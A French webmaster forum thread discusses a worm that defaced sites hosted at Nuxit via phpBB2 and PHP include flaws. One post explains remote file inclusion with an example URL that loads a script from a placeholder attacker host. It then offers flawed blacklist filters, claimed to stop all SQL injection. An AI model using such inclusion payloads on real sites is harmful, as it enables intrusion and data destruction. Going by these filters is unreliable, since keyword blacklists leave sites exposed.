Hacking

WRInaute passionné
Nuxit c'est fait hacké : -http://gbooks2.melodysoft.com/app?ID=hacked011

voir site en exemple -www.jce-colmar.org
 
WRInaute accro
En voila un autre :

http://speropatronum.com/

Trouvé sur un autre forum
Chers Clients,

Certains d'entre vous ont eu la très désagréable surprise de trouver leur site piraté. Il y a en effet eu une déferlante de piratages au cours des deux dernières nuits. A la base, le logiciel phpBB2 préinstallé sur chaque compte, et dont les failles sont exploitées si il n'a pas été mis à jour (ou supprimé). C'est un ver qui utilise Google et d'autres moteurs pour repérer ses cibles potentielles. Ce ver remplace profite ensuite des failles de sécurité de phpBB2 pour remplacer tous les fichiers index qu'il trouve sur l'hébergement. Tout se passe par le biais de PHP (le ver n'a évidemment pas accès au FTP). Il peut y avoir d'autres effets de bord (suppression de dossiers...).

Au vu du nombre de piratages et de leur sévérité, nous entamons donc une procédure d'urgence. Tous les clients qui ont été piratés vont être auto-recensés, et nous ouvrirons pour chacun d'entre eux un nouvel hébergement. Il est en effet beaucoup plus prudent et propre de repartir sur un hébergement vierge, notamment sans le logiciel phpBB2 préinstallé, logiciel que nous allons par ailleurs définitivement abandonner au vu des problèmes de sécurité récurrents qu'il pose.

Nous mettons donc aussi rapidement que possible en place cette procédure et vous tenons informé par e-mail.

M.C.
 
WRInaute passionné
non google n'a pas bloqué toutes les requètes sensibles, de plus il y a d'autres moteurs qui peuvent servir.
 
WRInaute impliqué
Donc, si j'ai bien compris, ils ont préinstallé phpBB pour leurs clients et ne l'ont pas mis à jour ?
:(

C'est un peu jouer avec le feu...
 
WRInaute impliqué
J'ai un site hébergé chez Nuxit, PHPBB a été effacé le jour de la créationdu compte et je fais aussi parti des piratés. Conclusion: rien à voir avec PHPBB je pense.

Bon, plus qu'à changer les mots de passe et auditer tout le code du site pour voir si rien n'a été touché.
 
WRInaute passionné
Daktari a dit:
Donc, si j'ai bien compris, ils ont préinstallé phpBB pour leurs clients et ne l'ont pas mis à jour ?
:(

C'est un peu jouer avec le feu...

Mais quand on connait pas les risques au départ et que l'info de l'existance d'un hack traquant les sites sur le web leur tombe dessus, j'imagine la galere pour mettre tous les clients à jour avant d'être hacké ! Le gars qui s'occupait de ca chez nuxit a du arreter de prier pour que ca n'arrive pas ;-)
 
WRInaute passionné
shrom a dit:
J'ai un site hébergé chez Nuxit, PHPBB a été effacé le jour de la créationdu compte et je fais aussi parti des piratés. Conclusion: rien à voir avec PHPBB je pense.

Bon, plus qu'à changer les mots de passe et auditer tout le code du site pour voir si rien n'a été touché.

Fort possible qu'il raconte des conneries chez nuxit.
Ca me fait marrer parce qu'un client avait un site chez un hébergeur de sa région un peu couteux. Je le conseille (c'est un client) et lui propose un hébergeur reconnu et de plus conseillé par wri : sivit.
Mais le client c'est en fait une assoc avec comité et tout le bazard. La moindre decision doit être votée. Et ils ont préféré aller chez nuxit.
Leur site était inaccessible pendant 1 mois (transfert du ndd), déjà là ils ont merdé et maintenant que le site est enfin en ligne depuis aujourd'hui, le voilà hacké !
 
WRInaute discret
Je me suis fait hacké et je n'ai pas phpBB, donc soit la faille php permet d'accéder a l'ensemble du serveur (fort probable) et je me suis fait pourrir grace au phpbb d'un autre, soit il y a une autre faille.

Le hack etait plutot gentil: ajout d'une page index.html

Proposer des logiciels preinstallés n'apporte pas grand chose car si le gars ne sait pas s'installer un logiciel, je ne vois pas bien comment il va l'administrer.

Pour le transfert du nom de domaine, le merdouillage vient rarement de celui qui le recoit car il n'a pas grand chose a faire si ce n'est mettre a jour son DNS des que la partie administrative est réglée, c'est plutôt cette phase qui prend du temps car elle depend de la bonne volonté du premier prestataire.
 
WRInaute accro
Gentil le hack !!! merci pour l'image douteuse
et moi non plus je ne me sers pas de phpbb2
mais l'annuaire il est out et j'ai très peur que les dernieres modifs et sites soient perdus si je ne peux pas me servir de la backup d'aujourd'hui.
Pourquoi vous en avez après Nuxit, je suis très content d'etre chez eux jamais de bourdes ni de problemes de site pas online. au contraire je les trouve pro
 
WRInaute passionné
le vers profite des failles du include pour les sites géneriques et les failles SQL injection pour phpBB, j'avai posté un code qui permet d'éviter toutes les attaques de type SQL Injection à condition que les liens que vous utilisez pour vos pages ne contiennent pas des mot clés d'SQL (INSERT, UPDATE, DELETE, WHERE, UNION ...etc)

je l'ai posté sur le forum de bien phpBB.com avant l'attaque, et tt le monde m'a dis que ça servait à rien :p

si ça vous etes interesse je peut le reposter ;)
 
WRInaute accro
Désolé je ne comprends pas ta réponse Alladin, si ce n'était que phpbb2 (dont je ne me sers pas) pourquoi mes pages index htm et html sont elles touchées par ce ver ?
 
WRInaute passionné
alors, j'explique
à ma connaissance, il y a deux vers qui attaquent php à ce jours
ils utilisent des failles dans le code, à cause d'une mauvaise utilisation du include, et des faille SQL injection de phpBB (et d'autres forums)
I - la faille include
1 -Détection d'une victime potentielle : le vers cherche dans google des url du type -http://www.unsite.net/index.php?page=page1.php
2 -L'attaque, il remplace page1.php par un code malicieux qui parcours les fichiers et en fait ce qu'il veut :
-http://www.unsite.net/index.php?page=http://www.serveurduhacker.net/destroyfiles.php

* qu'est ce qui se passe ?
s'il n'ya aucune vérification de la variable $page
le include vas inclure le script destroyfile.php et l'interpreter comme un script local !!! il a donc acces à tout les fichiers !!!!

** éviter l'attaque :
il suffit de tester le contenu de la variable $page avant de l'inclure, par exemple :
Code:
      if (stristr($page, "http://") ) $page="index.php";
      include ($page.php);


II l'SQL Injection
1 -Détection de la victime :
il faut connaitre l'exploit à l'avance, ensuite le ver essai d'identifier les forum qui peuvent etre touchés par cette exploit (je ne sait pas exactement comment il fait)

2 -L'Attaque :
je ne vais pas expliquer comment marche ce type d'attaque car elle est très bien expliquée sur pleins de sites, mais en gros elle consiste à faire executer une requete SQL par le site attaqué afin d'obtenir des informations tel que les mot de passes etc .. ou DETRUIRE des tables


** éviter l'attaque
voici le code que j'ai proposé , à inserrer tout au debut de la page car il doit modifier les entetes s'il detecte une attaque
Code:
<?
$urlregx ="([:space:]<[:space:]|[:space:]>[:space:]|;|[:space:]UNION[:space:]|[:space:]ALL[:space:]|[:space:]SELECT[:space:]|[:space:]WHERE[:space:]|[:space:]OR[:space:]|[:space:]AND[:space:])";
if ( eregi($urlregx, $QUERY_STRING))
{
header("HTTP/1.1 301 Moved Permanently");
header("Location: trackattak.php");
exit();
}
?>
dans le code trackattak.php vous pouvez mettre un code qui récupère l'IP de l'attaquant par exemple ...

théoriquement il protège contre toutes les attaques SQL injection mais si vous avez des idée pour le perfectionner je suis preneur ;)
 
Discussions similaires
Haut